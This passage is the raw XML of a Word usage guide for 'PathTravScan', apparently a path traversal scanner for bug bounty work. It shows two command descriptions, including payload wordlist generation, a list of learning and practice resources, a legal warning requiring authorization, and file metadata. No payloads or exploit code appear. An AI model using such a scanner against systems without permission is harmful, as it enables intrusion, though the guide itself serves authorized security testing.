          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  repeater               Launch Burp-style manual repeater</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  generate               Generate and export payload wordlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Learning Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1  Essential Reading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP — Path Traversal: owasp.org/www-community/attacks/Path_Traversal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Academy — File Path Traversal (free labs): portswigger.net/web-security/file-path-traversal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PayloadsAllTheThings — File Inclusion: github.com/swisskyrepo/PayloadsAllTheThings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HackerOne Hacktivity (real bug reports): hackerone.com/hacktivity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug Bounty Forum: bugbountyforum.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2  Practice Platforms (Legal, Safe Environments)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Academy — Free interactive LFI labs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox — Machines with path traversal CVEs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe — Beginner-friendly LFI rooms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA (Damn Vulnerable Web App) — Run locally for practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnHub — Downloadable vulnerable VMs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3  Legal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pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ LEGAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">This tool is for AUTHORIZED penetration testing and bug bounty programs only. Unauthorized use is illegal under the Computer Fraud and Abuse Act (CFAA) and equivalent laws worldwide. Always get written permission before testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A5276" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">PathTravScan v1.0.0 — Made for the bug bounty and security research community</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⭐ Star the repo if this helped you find a bug!</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pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">github.com/rastthack/PathTravScan</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="566573"/>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pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A5276"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">PathTravScan — Complete Usage Guide</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">    |    For Authorized Testing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2026-04-25T09:40:32.034Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-25T09:40:32.036Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>